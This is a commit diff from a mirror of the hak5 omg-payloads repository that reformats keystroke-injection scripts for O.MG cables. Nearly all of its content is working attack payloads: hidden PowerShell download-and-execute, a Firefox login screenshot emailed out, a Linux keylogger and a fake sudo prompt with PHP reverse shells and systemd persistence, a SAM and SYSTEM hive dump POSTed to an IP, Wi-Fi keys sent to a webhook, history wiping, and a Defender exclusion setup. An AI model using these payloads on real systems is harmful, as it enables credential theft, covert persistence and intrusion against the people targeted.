hak5
/
omg-payloads
mirror of https://github.com/hak5/omg-payloads.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Fixing misc execution or formatting errors 

There are many payloads in the repo that do not run due to compiler errors (mostly typos, but a few commands that do not exist on O.MG devices).

Fixing those errors, along with implementing minor changes such as using STRINGLN in place of STRING and ENTER, or DEFAULT_DELAY in place of DELAY 200 on every other line for improved readability.

No content of these scripts has been altered, and I do not intend to run them to validate that they work as intended on their target operating systems.
syntaxFixes
kalanihelekunihi 2023-06-05 12:29:42 -04:00
parent 63ce12dd61
commit 4a0fdf22c3
32 changed files with 679 additions and 1249 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

21
payloads/library/credentials/-OMG-Credz-Plz/Credz-Plz-Execute.txt
View File

@ -1,15 +1,18 @@
REM Title: Credz-Plz REM_BLOCK
Title: Credz-Plz
Author: I am Jakoby
Target: Windows 10, 11
REM Author: I am Jakoby Description: This payload is meant to prompt the target to enter their creds to later be ted with dropbox. See README.md file for more details.
REM Description: This payload is meant to prompt the target to enter their creds to later be exfiltrated with dropbox. See README.md file for more details. Remember to replace the link with your DropBox shared link for the intended file to download
Also remember to replace ?dl=0 with ?dl=1 at the end of your link so it is executed properly
END_REM
REM Target: Windows 10, 11 DEFINE #URL
DUCKY_LANG US
DELAY 2000
GUI r GUI r
DELAY 500 DELAY 500
STRING powershell -w h -NoP -NonI -Exec Bypass $pl = iwr https:// < Your Shared link for the intended file> ?dl=1; invoke-expression $pl STRINGLN powershell -w h -NoP -NonI -Exec Bypass $pl = iwr https://#URL?dl=1; invoke-expression $pl
ENTER
REM Remember to replace the link with your DropBox shared link for the intended file to download
REM Also remember to replace ?dl=0 with ?dl=1 at the end of your link so it is executed properly

186
payloads/library/credentials/Harvester_OF_SORROW/payload.txt
View File

@ -1,192 +1,92 @@
REM Title: Harvester_OF_SORROW REM_BLOCK
REM Author: LulzAnarchyAnon Title: Harvester_OF_SORROW
REM Description: This payload is a long, hard work around to bypass Microsoft Security in Firefox where a Author: LulzAnarchyAnon
REM pin, or password is required to export saved log in credentials. Description: This payload is a long, hard work around to bypass Microsoft Security in Firefox where a pin, or password is required to export saved log in credentials.
REM The payload opens firefox about:logins, and tabs, and arrows its way through options. It then takes
REM a screen shot with the first set of log in credentials made visible. Finally it sends the screenshot The payload opens firefox about:logins, and tabs, and arrows its way through options. It then takes a screen shot with the first set of log in credentials made visible. Finally it sends the screenshot to an email of your choosing.
REM to an email of your choosing.
REM Target: Windows 10, PowerShell & Mozilla Firefox Target: Windows 10, PowerShell & Mozilla Firefox
Props: Darren Kitchen, KARROTKAK3, I am Jakoby and the-jcksn Props: Darren Kitchen, KARROTKAK3, I am Jakoby and the-jcksn
REM Version: 1.0
REM Category: Credentials (OMG)
Version: 1.0
Category: Credentials (OMG)
REM Payload DELAYS,TABS AND ARROWS may need to be ajusted depending on target system speeds. Payload DELAYS,TABS AND ARROWS may need to be ajusted depending on target system speeds.
REM After email aqusition you will be able to adjust DELAYS,TABS AND ARROWS to harvest other creds from After email aqusition you will be able to adjust DELAYS,TABS AND ARROWS to harvest other creds from the email screen shot.
REM the email screen shot.
You must change the USER_EMAIL and USER_PASSWORD to your outlook credentials.
Can exfil more than 5, but I chose 5 to keep file sizes low.
Can exfil from directory other than screenshots by changing path.
You might have to adjust the delays, depending on the target machine, but these worked ok for me.
Use responsibly, and within the confines of the law.
END_REM
DEFINE #USER_EMAIL user@example.com
DEFINE #USER_PASSWORD supersecretpassword
DUCKY_LANG US
DELAY 2000
DEFAULT_DELAY 200
GUI r GUI r
DELAY 200 STRINGLN firefox about:logins
STRING firefox about:logins
ENTER
DELAY 1000 DELAY 1000
TAB REPEAT 10 TAB
DELAY 200
TAB
DELAY 200
TAB
DELAY 200
TAB
DELAY 200
TAB
DELAY 200
TAB
DELAY 200
TAB
DELAY 200
TAB
DELAY 200
TAB
TAB
DELAY 1000 DELAY 1000
SHIFT SPACE SHIFT SPACE
DELAY 5000 DELAY 5000
PRINTSCREEN PRINTSCREEN
DELAY 5000 DELAY 5000
GUI r GUI r
DELAY 200 STRINGLN powershell -windowstyle hidden
STRING powershell -windowstyle hidden
ENTER
DELAY 2000 DELAY 2000
STRING mspaint STRINGLN mspaint
ENTER
DELAY 5000 DELAY 5000
CTRL v CTRL v
DELAY 2000 DELAY 2000
CTRL s CTRL s
TAB REPEAT 11 TAB
DELAY 300
TAB
DELAY 200
TAB
DELAY 200
TAB
DELAY 200
TAB
DELAY 200
TAB
DELAY 200
TAB
DELAY 200
TAB
DELAY 200
TAB
DELAY 200
TAB
DELAY 200
TAB
DELAY 100
RIGHTARROW RIGHTARROW
DELAY 100
DOWNARROW DOWNARROW
DELAY 100 REPEAT 2 RIGHTARROW
RIGHTARROW
DELAY 100
RIGHTARROW
DELAY 200
TAB TAB
DELAY 200
ENTER ENTER
CTRL RIGHTARROW REPEAT 2 CTRL RIGHTARROW
DELAY 100 REPEAT 13 TAB
CTRL RIGHTARROW REPEAT 2 RIGHTARROW
DELAY 100
TAB
DELAY 200
TAB
DELAY 200
TAB
DELAY 200
TAB
DELAY 200
TAB
DELAY 200
TAB
DELAY 200
TAB
DELAY 200
TAB
DELAY 200
TAB
DELAY 200
TAB
DELAY 200
TAB
DELAY 200
TAB
DELAY 200
TAB
DELAY 200
RIGHTARROW
DELAY 200
RIGHTARROW
ENTER ENTER
TAB TAB
ENTER ENTER
DELAY 1000 DELAY 1000
ALT f ALT f
DELAY 50
ALT X ALT X
DELAY 50
ALT f ALT f
DELAY 50
X X
DELAY 2000 DELAY 2000
REM ~~~~ You must change the USER_EMAIL and USER_PASSWORD to your outlook credentials.
REM ~~~~ Can exfil more than 5, but I chose 5 to keep file sizes low.
REM ~~~~ Can exfil from directory other than screenshots by changing path on lines 18, 57, and 61.
REM ~~~~ You might have to adjust the delays, depending on the target machine, but these worked ok for me.
REM ~~~~ Use responsibly, and within the confines of the law.
DELAY 2000
GUI r GUI r
DELAY 200
REM navigating to the directory to exfil from - change the following if you do not want the latest screenshots REM navigating to the directory to exfil from - change the following if you do not want the latest screenshots
STRING %USERPROFILE%\Pictures\Screenshots STRINGLN %USERPROFILE%\Pictures\Screenshots
ENTER
DELAY 150
REM sorting the files by date REM sorting the files by date
MENU SHIFT F10
DELAY 150
STRING o STRING o
DELAY 150
DOWNARROW DOWNARROW
DELAY 150
ENTER ENTER
DELAY 150
REM selecting files to exfil, repeat this line if you want more than 5, but bear in mind this might impact some of the delays REM selecting files to exfil, repeat this line if you want more than 5, but bear in mind this might impact some of the delays
SHIFT RIGHTARROW REPEAT 4 SHIFT RIGHTARROW
SHIFT RIGHTARROW
SHIFT RIGHTARROW
SHIFT RIGHTARROW
DELAY 150
REM sending files to loot.zip REM sending files to loot.zip
MENU SHIFT F10
DELAY 150
STRING n STRING n
DELAY 200
DOWNARROW DOWNARROW
DELAY 150
ENTER ENTER
DELAY 500 DELAY 500
STRING loot STRINGLN loot
ENTER
DELAY 150
ALT F4 ALT F4
DELAY 150
GUI r GUI r
DELAY 150
REM open powershell and send the email REM open powershell and send the email
STRING powershell STRINGLN powershell
ENTER
DELAY 500 DELAY 500
REM ~~~~~~~CHANGE THE USERNAME (3 times) AND PASSWORD (once) IN THE FOLLOWING~~~~~ REM ~~~~~~~CHANGE THE USERNAME (3 times) AND PASSWORD (once) IN THE FOLLOWING~~~~~
STRING Send-MailMessage -From user@example.com -To user@example.com -Subject "Photo loot" -Body "Please find attached your zip file" -Attachment "Pictures\Screenshots\loot.zip" -SmtpServer smtp-mail.outlook.com -Port 587 -UseSsl -Credential (New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList user@example.com, (ConvertTo-SecureString -String "supersecretpassword" -AsPlainText -Force)) STRINGLN Send-MailMessage -From #USER_EMAIL -To #USER_EMAIL -Subject "Photo loot" -Body "Please find attached your zip file" -Attachment "Pictures\Screenshots\loot.zip" -SmtpServer smtp-mail.outlook.com -Port 587 -UseSsl -Credential (New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList #USER_EMAIL, (ConvertTo-SecureString -String "#USER_PASSWORD" -AsPlainText -Force))
ENTER
DELAY 500 DELAY 500
REM cleanup REM cleanup
STRING del Pictures\Screenshots\loot.zip STRINGLN del Pictures\Screenshots\loot.zip
ENTER STRINGLN exit
DELAY 150
STRING exit
ENTER

84
payloads/library/credentials/OMGLogger/payload.txt
View File

@ -1,93 +1,75 @@
REM Title: DuckyLogger REM_BLOCK
REM Description: Key logger which sends each and every key stroke of target remotely/locally. Title: DuckyLogger
REM AUTHOR: drapl0n Description: Key logger which sends each and every key stroke of target remotely/locally.
REM Version: 1.0 AUTHOR: drapl0n
REM Category: Credentials Version: 1.0
REM Target: Unix-like operating systems with systemd Category: Credentials
REM Attackmodes: HID Target: Unix-like operating systems with systemd
Attackmodes: HID
REM [Note] Visit https://github.com/drapl0n/DuckyLogger/README.md for usage and other important instructions.
REM Visit https://github.com/drapl0n/DuckyLogger/README.md for usage and other important instructions. END_REM
DUCKY_LANG US
REM [keeping tracks clear] REM [keeping tracks clear]
DELAY 5000 DELAY 5000
CTRL ALT t CTRL ALT t
DELAY 400 DELAY 400
STRING unset HISTFILE && HISTSIZE=0 && rm -f $HISTFILE && unset HISTFILE STRINGLN unset HISTFILE && HISTSIZE=0 && rm -f $HISTFILE && unset HISTFILE
ENTER
DELAY 100 DELAY 100
REM [creating key logging mechanism] REM [creating key logging mechanism]
STRING mkdir /var/tmp/.system STRINGLN mkdir /var/tmp/.system
ENTER
DELAY 100 DELAY 100
STRING echo "/var/tmp/.system/./xinput list | grep -Po 'id=\K\d+(?=.*slave\s*keyboard)' | xargs -P0 -n1 /var/tmp/.system/./xinput test" > /var/tmp/.system/sys STRINGLN echo "/var/tmp/.system/./xinput list | grep -Po 'id=\K\d+(?=.*slave\s*keyboard)' | xargs -P0 -n1 /var/tmp/.system/./xinput test" > /var/tmp/.system/sys
ENTER
DELAY 100 DELAY 100
STRING chmod +x /var/tmp/.system/sys STRINGLN chmod +x /var/tmp/.system/sys
ENTER
DELAY 100 DELAY 100
REM [importing xinput] REM [importing xinput]
STRING cd /var/tmp/.system/ STRINGLN cd /var/tmp/.system/
ENTER
DELAY 100 DELAY 100
STRING wget --no-check-certificate --content-disposition https://github.com/drapl0n/DuckyLogger/blob/main/xinput\?raw=true STRINGLN wget --no-check-certificate --content-disposition https://github.com/drapl0n/DuckyLogger/blob/main/xinput\?raw=true
ENTER
DELAY 5000 DELAY 5000
STRING chmod +x xinput STRINGLN chmod +x xinput
ENTER
DELAY 100 DELAY 100
REM [creating reverse shell] REM [creating reverse shell]
STRING echo -e "while :\ndo\n\tping -c 5 0.0.0.0\n\tif [ $? -eq 0 ]; then\n\t\tphp -r '\$sock=fsockopen(\"0.0.0.0\",4444);exec("\"/var/tmp/.system/sys -i "<&3 >&3 2>&3"\"");'\n\tfi\ndone" > /var/tmp/.system/systemBus STRINGLN echo -e "while :\ndo\n\tping -c 5 0.0.0.0\n\tif [ $? -eq 0 ]; then\n\t\tphp -r '\$sock=fsockopen(\"0.0.0.0\",4444);exec("\"/var/tmp/.system/sys -i "<&3 >&3 2>&3"\"");'\n\tfi\ndone" > /var/tmp/.system/systemBus
ENTER
DELAY 100 DELAY 100
STRING chmod +x /var/tmp/.system/systemBus STRINGLN chmod +x /var/tmp/.system/systemBus
ENTER
DELAY 100 DELAY 100
REM [creating systemd service to execute payload on boot] REM [creating systemd service to execute payload on boot]
STRING mkdir -p ~/.config/systemd/user STRINGLN mkdir -p ~/.config/systemd/user
ENTER
DELAY 200 DELAY 200
STRING echo -e "[Unit]\nDescription= System BUS handler\n\n[Service]\nExecStart=/bin/bash /var/tmp/.system/systemBus -no-browser\nRestart=on-failure\nSuccessExitStatus=3 4\nRestartForceExitStatus=3 4\n\n[Install]\nWantedBy=default.target" > ~/.config/systemd/user/systemBUS.service STRINGLN echo -e "[Unit]\nDescription= System BUS handler\n\n[Service]\nExecStart=/bin/bash /var/tmp/.system/systemBus -no-browser\nRestart=on-failure\nSuccessExitStatus=3 4\nRestartForceExitStatus=3 4\n\n[Install]\nWantedBy=default.target" > ~/.config/systemd/user/systemBUS.service
ENTER
DELAY 100 DELAY 100
REM [creating reboot script incase if listner stops or targets internet connection gets lost] REM [creating reboot script incase if listner stops or targets internet connection gets lost]
STRING echo "while true; do systemctl --user restart systemBUS.service; sleep 15m; done" > /var/tmp/.system/reboot STRINGLN echo "while true; do systemctl --user restart systemBUS.service; sleep 15m; done" > /var/tmp/.system/reboot
ENTER
DELAY 100 DELAY 100
STRING chmod +x /var/tmp/.system/reboot STRINGLN chmod +x /var/tmp/.system/reboot
ENTER
DELAY 100 DELAY 100
REM [creating systemd service to execute payload on boot] REM [creating systemd service to execute payload on boot]
STRING echo -e "[Unit]\nDescription= System BUS handler reboot.\n\n[Service]\nExecStart=/bin/bash /var/tmp/.system/reboot -no-browser\nRestart=on-failure\nSuccessExitStatus=3 4\nRestartForceExitStatus=3 4\n\n[Install]\nWantedBy=default.target" > ~/.config/systemd/user/reboot.service STRINGLN echo -e "[Unit]\nDescription= System BUS handler reboot.\n\n[Service]\nExecStart=/bin/bash /var/tmp/.system/reboot -no-browser\nRestart=on-failure\nSuccessExitStatus=3 4\nRestartForceExitStatus=3 4\n\n[Install]\nWantedBy=default.target" > ~/.config/systemd/user/reboot.service
ENTER
DELAY 100 DELAY 100
REM [enabling service] REM [enabling service]
STRING systemctl --user daemon-reload STRINGLN systemctl --user daemon-reload
ENTER
DELAY 300 DELAY 300
STRING systemctl --user enable --now systemBUS.service STRINGLN systemctl --user enable --now systemBUS.service
ENTER
DELAY 150 DELAY 150
STRING systemctl --user start --now systemBUS.service STRINGLN systemctl --user start --now systemBUS.service
ENTER
DELAY 150 DELAY 150
STRING systemctl --user enable --now reboot.service STRINGLN systemctl --user enable --now reboot.service
ENTER
DELAY 150 DELAY 150
STRING systemctl --user start --now reboot.service STRINGLN systemctl --user start --now reboot.service
ENTER
DELAY 100 DELAY 100
REM [autostarting service on terminal/shell launch] REM [autostarting service on terminal/shell launch]
STRING echo -e "ls -a | grep 'zshrc' &> /dev/null\nif [ \$? = 0 ]; then\n\techo \"systemctl --user enable --now reboot.service && systemctl --user enable --now systemBUS.service\" >> ~/.zshrc\nfi\n\nls -a | grep 'bashrc' &> /dev/null\nif [ \$? = 0 ]; then\n\techo \"systemctl --user enable --now reboot.service && systemctl --user enable --now systemBUS.service\" >> ~/.bashrc\nfi" > ~/tmmmp STRINGLN echo -e "ls -a | grep 'zshrc' &> /dev/null\nif [ \$? = 0 ]; then\n\techo \"systemctl --user enable --now reboot.service && systemctl --user enable --now systemBUS.service\" >> ~/.zshrc\nfi\n\nls -a | grep 'bashrc' &> /dev/null\nif [ \$? = 0 ]; then\n\techo \"systemctl --user enable --now reboot.service && systemctl --user enable --now systemBUS.service\" >> ~/.bashrc\nfi" > ~/tmmmp
ENTER
DELAY 100 DELAY 100
STRING chmod +x ~/tmmmp && cd ~/ && ./tmmmp && rm tmmmp && exit STRINGLN chmod +x ~/tmmmp && cd ~/ && ./tmmmp && rm tmmmp && exit
ENTER

39
payloads/library/credentials/SamDumpCable/payload.txt
View File

@ -1,33 +1,24 @@
REM Title: SamDumpCable REM_BLOCK
REM Description: Dump users sam and system hive and exfiltrate them. Afterwards you can use a tool like samdump2, to get the users hashes. Title: SamDumpCable
REM Author: 0iphor13 Description: Dump users sam and system hive and exfiltrate them. Afterwards you can use a tool like samdump2, to get the users hashes.
REM Version: 1.0 Author: 0iphor13
REM Category: Credentials Version: 1.0
REM Requirements: OMG Firmware v.2.5 or higher Category: Credentials
Requirements: OMG Firmware v.2.5 or higher
END_REM
DEFINE #IPADDRESS 0.0.0.0
DELAY 1000
DUCKY_LANG de DUCKY_LANG de
DELAY 500 DELAY 2000
DEFAULT_DELAY 500
DELAY 1500
GUI r GUI r
DELAY 500 STRINGLN powershell Start-Process powershell -Verb runAs
STRING powershell Start-Process powershell -Verb runAs
DELAY 500
ENTER
DELAY 1000
REM Change this Change this shortcut depending on the systems language (engl.: ALT y) REM Change this Change this shortcut depending on the systems language (engl.: ALT y)
ALT j ALT j
DELAY 250
STRING powershell.exe -NoP -enc cgBlAGcAIABzAGEAdgBlACAAaABrAGwAbQBcAHMAYQBtACAAMQAzADMANwBPAE0ARwBzAGEAbQA7AHIAZQBnACAAcwBhAHYAZQAgAGgAawBsAG0AXABzAHkAcwB0AGUAbQAgADEAMwAzADcATwBNAEcAcwB5AHMAOwBDAG8AbQBwAHIAZQBzAHMALQBBAHIAYwBoAGkAdgBlACAALQBQAGEAdABoACAAIgAkAFAAVwBEAFwAMQAzADMANwBPAE0ARwBzAHkAcwAiACwAIAAiACQAUABXAEQAXAAxADMAMwA3AE8ATQBHAHMAYQBtACIAIAAtAEQAZQBzAHQAaQBuAGEAdABpAG8AbgBQAGEAdABoACAATwBNAEcAZAB1AG0AcAAuAHoAaQBwADsAcgBlAG0AbwB2AGUALQBpAHQAZQBtACAAMQAzADMANwBPAE0ARwBzAHkAcwA7AHIAZQBtAG8AdgBlAC0AaQB0AGUAbQAgADEAMwAzADcATwBNAEcAcwBhAG0AOwBlAHgAaQB0AA== STRINGLN powershell.exe -NoP -enc cgBlAGcAIABzAGEAdgBlACAAaABrAGwAbQBcAHMAYQBtACAAMQAzADMANwBPAE0ARwBzAGEAbQA7AHIAZQBnACAAcwBhAHYAZQAgAGgAawBsAG0AXABzAHkAcwB0AGUAbQAgADEAMwAzADcATwBNAEcAcwB5AHMAOwBDAG8AbQBwAHIAZQBzAHMALQBBAHIAYwBoAGkAdgBlACAALQBQAGEAdABoACAAIgAkAFAAVwBEAFwAMQAzADMANwBPAE0ARwBzAHkAcwAiACwAIAAiACQAUABXAEQAXAAxADMAMwA3AE8ATQBHAHMAYQBtACIAIAAtAEQAZQBzAHQAaQBuAGEAdABpAG8AbgBQAGEAdABoACAATwBNAEcAZAB1AG0AcAAuAHoAaQBwADsAcgBlAG0AbwB2AGUALQBpAHQAZQBtACAAMQAzADMANwBPAE0ARwBzAHkAcwA7AHIAZQBtAG8AdgBlAC0AaQB0AGUAbQAgADEAMwAzADcATwBNAEcAcwBhAG0AOwBlAHgAaQB0AA==
DELAY 200
ENTER
DELAY 200
REM Insert your recieving servers IP here ---------------------------------------------------------- REM Insert your recieving servers IP here ----------------------------------------------------------
STRING iwr "http://0.0.0.0" -Method POST -InFile OMGdump.zip;Remove-Item OMGdump.zip;exit STRINGLN iwr "http://#IPADDRESS" -Method POST -InFile OMGdump.zip;Remove-Item OMGdump.zip;exit
DELAY 200
ENTER

97
payloads/library/credentials/SudoSnatch/payload.txt
View File

@ -1,82 +1,51 @@
REM Title: sudoSnatch REM_BLOCK
REM Description: sudoSnatch payload grabs sudo password in plain text, imediately after victim uses `sudo` command and sends it back to attacker remotely/locally.. Title: sudoSnatch
REM AUTHOR: drapl0n Description: sudoSnatch payload grabs sudo password in plain text, imediately after victim uses `sudo` command and sends it back to attacker remotely/locally..
REM Version: 1.0
REM Category: Credentials AUTHOR: drapl0n
REM Target: Unix-like operating systems with systemd Version: 1.0
REM Attackmodes: HID Category: Credentials
Target: Unix-like operating systems with systemd
Attackmodes: HID
END_REM
DUCKY_LANG US
DELAY 2000
DEFAULT_DELAY 100
REM [keeping tracks clear] REM [keeping tracks clear]
DELAY 5000
CTRL ALT t CTRL ALT t
DELAY 400 DELAY 400
STRING unset HISTFILE && HISTSIZE=0 && rm -f $HISTFILE && unset HISTFILE STRINGLN unset HISTFILE && HISTSIZE=0 && rm -f $HISTFILE && unset HISTFILE
ENTER
DELAY 100
REM [creating password grabbing mechanism] REM [creating password grabbing mechanism]
STRING mkdir /var/tmp/.system STRINGLN mkdir /var/tmp/.system
ENTER STRINGLN echo -e "#\!/bin/bash\necho -n \"[sudo] password for \$(whoami):\"\nIFS=\"\" read -s pass\necho -e \"Timestamp=[\$(date)] \\\t User=[\$(whoami)] \\\t Password=[\$pass]\" >> /var/tmp/.system/sysLog\necho -e \"\\\nSorry, try again.\"" > /var/tmp/.system/systemMgr
DELAY 100 STRINGLN touch /var/tmp/.system/sysLog
STRING echo -e "#\!/bin/bash\necho -n \"[sudo] password for \$(whoami):\"\nIFS=\"\" read -s pass\necho -e \"Timestamp=[\$(date)] \\\t User=[\$(whoami)] \\\t Password=[\$pass]\" >> /var/tmp/.system/sysLog\necho -e \"\\\nSorry, try again.\"" > /var/tmp/.system/systemMgr STRINGLN chmod +x /var/tmp/.system/systemMgr
ENTER
DELAY 100
STRING touch /var/tmp/.system/sysLog
ENTER
DELAY 100
STRING chmod +x /var/tmp/.system/systemMgr
ENTER
DELAY 100
REM [creating reverse shell] REM [creating reverse shell]
STRING echo -e "while :\ndo\n\tping -c 5 0.0.0.0\n\tif [ $? -eq 0 ]; then\n\t\tphp -r '\$sock=fsockopen(\"0.0.0.0\",4444);exec("\"cat /var/tmp/.system/sysLog "<&3 >&3 2>&3"\"");'\n\tfi\ndone" > /var/tmp/.system/systemBus STRINGLN echo -e "while :\ndo\n\tping -c 5 0.0.0.0\n\tif [ $? -eq 0 ]; then\n\t\tphp -r '\$sock=fsockopen(\"0.0.0.0\",4444);exec("\"cat /var/tmp/.system/sysLog "<&3 >&3 2>&3"\"");'\n\tfi\ndone" > /var/tmp/.system/systemBus
ENTER STRINGLN chmod +x /var/tmp/.system/systemBus
DELAY 100
STRING chmod +x /var/tmp/.system/systemBus
ENTER
DELAY 100
REM [creating systemd service to execute payload on boot] REM [creating systemd service to execute payload on boot]
STRING mkdir -p ~/.config/systemd/user STRINGLN mkdir -p ~/.config/systemd/user
ENTER STRINGLN echo -e "[Unit]\nDescription= System BUS handler\n\n[Service]\nExecStart=/bin/bash /var/tmp/.system/systemBus -no-browser\nRestart=on-failure\nSuccessExitStatus=3 4\nRestartForceExitStatus=3 4\n\n[Install]\nWantedBy=default.target" > ~/.config/systemd/user/systemBUS.service
DELAY 200
STRING echo -e "[Unit]\nDescription= System BUS handler\n\n[Service]\nExecStart=/bin/bash /var/tmp/.system/systemBus -no-browser\nRestart=on-failure\nSuccessExitStatus=3 4\nRestartForceExitStatus=3 4\n\n[Install]\nWantedBy=default.target" > ~/.config/systemd/user/systemBUS.service
ENTER
DELAY 100
REM [creating reboot script incase if listner stops or targets internet connection gets lost] REM [creating reboot script incase if listner stops or targets internet connection gets lost]
STRING echo "while true; do systemctl --user restart systemBUS.service; sleep 15m; done" > /var/tmp/.system/reboot STRINGLN echo "while true; do systemctl --user restart systemBUS.service; sleep 15m; done" > /var/tmp/.system/reboot
ENTER STRINGLN chmod +x /var/tmp/.system/reboot
DELAY 100
STRING chmod +x /var/tmp/.system/reboot
ENTER
DELAY 100
REM [creating systemd service for reboot] REM [creating systemd service for reboot]
STRING echo -e "[Unit]\nDescription= System BUS handler reboot.\n\n[Service]\nExecStart=/bin/bash /var/tmp/.system/reboot -no-browser\nRestart=on-failure\nSuccessExitStatus=3 4\nRestartForceExitStatus=3 4\n\n[Install]\nWantedBy=default.target" > ~/.config/systemd/user/reboot.service STRINGLN echo -e "[Unit]\nDescription= System BUS handler reboot.\n\n[Service]\nExecStart=/bin/bash /var/tmp/.system/reboot -no-browser\nRestart=on-failure\nSuccessExitStatus=3 4\nRestartForceExitStatus=3 4\n\n[Install]\nWantedBy=default.target" > ~/.config/systemd/user/reboot.service
ENTER
DELAY 100
REM [enabling services] REM [enabling services]
STRING systemctl --user daemon-reload STRINGLN systemctl --user daemon-reload
ENTER STRINGLN systemctl --user enable --now systemBUS.service
DELAY 300 STRINGLN systemctl --user start --now systemBUS.service
STRING systemctl --user enable --now systemBUS.service STRINGLN systemctl --user enable --now reboot.service
ENTER STRINGLN systemctl --user start --now reboot.service
DELAY 150
STRING systemctl --user start --now systemBUS.service
ENTER
DELAY 150
STRING systemctl --user enable --now reboot.service
ENTER
DELAY 150
STRING systemctl --user start --now reboot.service
ENTER
DELAY 100
REM [autostarting service on terminal/shell launch] REM [autostarting service on terminal/shell launch]
STRING echo -e "#\!/bin/bash\nls -a | grep 'zshrc' &> /dev/null\nif [ \$? = 0 ]; then\n\techo -e \"alias sudo='bash /var/tmp/.system/systemMgr && sudo'\" >> ~/.zshrc\n\techo \"systemctl --user enable --now reboot.service && systemctl --user enable --now systemBUS.service && systemctl --user restart systemBUS.service && systemctl --user restart reboot.service\" >> ~/.zshrc\nfi\n\nls -a | grep 'bashrc' &> /dev/null\nif [ \$? = 0 ]; then\n\techo -e \"alias sudo='bash /var/tmp/.system/systemMgr && sudo'\" >> ~/.bashrc\n\techo \"systemctl --user enable --now reboot.service && systemctl --user enable --now systemBUS.service && systemctl --user restart systemBUS.service && systemctl --user restart reboot.service\" >> ~/.bashrc\nfi" > ~/tmmmp STRINGLN echo -e "#\!/bin/bash\nls -a | grep 'zshrc' &> /dev/null\nif [ \$? = 0 ]; then\n\techo -e \"alias sudo='bash /var/tmp/.system/systemMgr && sudo'\" >> ~/.zshrc\n\techo \"systemctl --user enable --now reboot.service && systemctl --user enable --now systemBUS.service && systemctl --user restart systemBUS.service && systemctl --user restart reboot.service\" >> ~/.zshrc\nfi\n\nls -a | grep 'bashrc' &> /dev/null\nif [ \$? = 0 ]; then\n\techo -e \"alias sudo='bash /var/tmp/.system/systemMgr && sudo'\" >> ~/.bashrc\n\techo \"systemctl --user enable --now reboot.service && systemctl --user enable --now systemBUS.service && systemctl --user restart systemBUS.service && systemctl --user restart reboot.service\" >> ~/.bashrc\nfi" > ~/tmmmp
ENTER STRINGLN chmod +x ~/tmmmp && cd ~/ && ./tmmmp && rm tmmmp && exit
DELAY 100
STRING chmod +x ~/tmmmp && cd ~/ && ./tmmmp && rm tmmmp && exit
ENTER

43
payloads/library/credentials/wifigrabber/payload.txt
View File

@ -1,27 +1,24 @@
REM I took my own code and found the other version already made. I combined them to make it better REM_BLOCK
REM this is a modified version of https://github.com/MTK911/Attiny85/blob/master/payloads/Wi-Fi%20password%20stealer/Wifikey-Grab.ino DESCRIPTION:
REM this is designed for the omg cable instead of the tiny. I took my own code and found the other version already made. I combined them to make it better.
This is a modified version of https://github.com/MTK911/Attiny85/blob/master/payloads/Wi-Fi%20password%20stealer/Wifikey-Grab.ino
This is designed for the omg cable instead of the tiny.
END_REM
DEFINE #WEBHOOKADDR <ADD-WEBHOOK-ADDRESS-HERE>
DUCKY_LANG US
DELAY 2000
DEFAULT_DELAY 500
Delay 3000
STRING GUI r STRING GUI r
Delay 100 STRINGLN cmd /k mode con: cols=15 lines=1
String cmd /k mode con: cols=15 lines=1 STRINGLN cd %temp%
Enter STRINGLN netsh wlan export profile key=clear
Delay 500 STRINGLN powershell Select-String -Path Wi*.xml -Pattern 'keyMaterial' > Wi-Fi-PASS
String cd %temp% DELAY 3000
Enter STRINGLN powershell Invoke-WebRequest -Uri https://webhook.site/#WEBHOOKADDR -Method POST -InFile Wi-Fi-PASS
Delay 500
String netsh wlan export profile key=clear
Enter
Delay 1000
String powershell Select-String -Path Wi*.xml -Pattern 'keyMaterial' > Wi-Fi-PASS
Enter
Delay 3000 Delay 3000
String powershell Invoke-WebRequest -Uri https://webhook.site/<ADD-WEBHOOK-ADDRESS-HERE> -Method POST -InFile Wi-Fi-PASS STRINGLN del Wi* /s /f /q
Enter STRINGLN exit
Delay 3000
String del Wi* /s /f /q
Enter
Delay 1000
Exit

16
payloads/library/execution/-OMG-Play-WAV/Play-WAV-Execute
View File

@ -1,16 +0,0 @@
REM Title: Play-WAV
REM Author: I am Jakoby
REM Description: This payload is meant to play a WAV file hidden. See Play-WAV.ps1 for more details
REM Target: Windows 10, 11
REM Remeber to replace the link with your link for the intended file to download
REM Also remember to replace ?dl=0 with ?dl=1 at the end of your link so it is executed properly
GUI r
DELAY 500
STRING powershell -w h -NoP -NonI -Exec Bypass iwr https:// < Your Shared link for the intended file> ?dl=1 -O $env:TMP\e.wav
DELAY 500
ENTER

19
payloads/library/execution/-OMG-Play-WAV/Play-WAV-Execute.txt Normal file
View File

@ -0,0 +1,19 @@
REM_BLOCK
Title: Play-WAV
Author: I am Jakoby
Description: This payload is meant to play a WAV file hidden. See Play-WAV.ps1 for more
Target: Windows 10, 11
Remeber to replace the link with your link for the intended file to download
Also remember to replace ?dl=0 with ?dl=1 at the end of your link so it is executed properly
END_REM
DEFINE #URL <Your Shared link for the intended file>
DUCKY_LANG US
DELAY 2000
GUI r
DELAY 500
STRINGLN powershell -w h -NoP -NonI -Exec Bypass iwr https://#URL?dl=1 -O $env:TMP\e.wav

31
payloads/library/execution/-OMG-SafeHaven/SafeHaven.txt
View File

@ -1,25 +1,20 @@
REM Title: Safe-Haven REM_BLOCK
Title: Safe-Haven
Author: I am Jakoby
REM Author: I am Jakoby Description: This is a UAC bypass payload that will open an elevated powershell console
Next a Directory called "safe" will be generated in your Documents Directory
The "safe" directory will be added to the Window's Defender Exclusion list
The AntiVirus will ignore all files downloaded to or ran from here
REM Description: This is a UAC bypass payload that will open an elevated powershell console Target: Windows 10, 11
REM Next a Directory called "safe" will be generated in your Documents Directory END_REM
REM The "safe" directory will be added to the Window's Defender Exclusion list
REM The AntiVirus will ignore all files downloaded to or ran from here
REM Target: Windows 10, 11 DUCKY_LANG US
DELAY 2000
DELAY 500
GUI r GUI r
DELAY 500 DELAY 500
STRING powershell STRINGLN powershell
ENTER
DELAY 1000 DELAY 1000
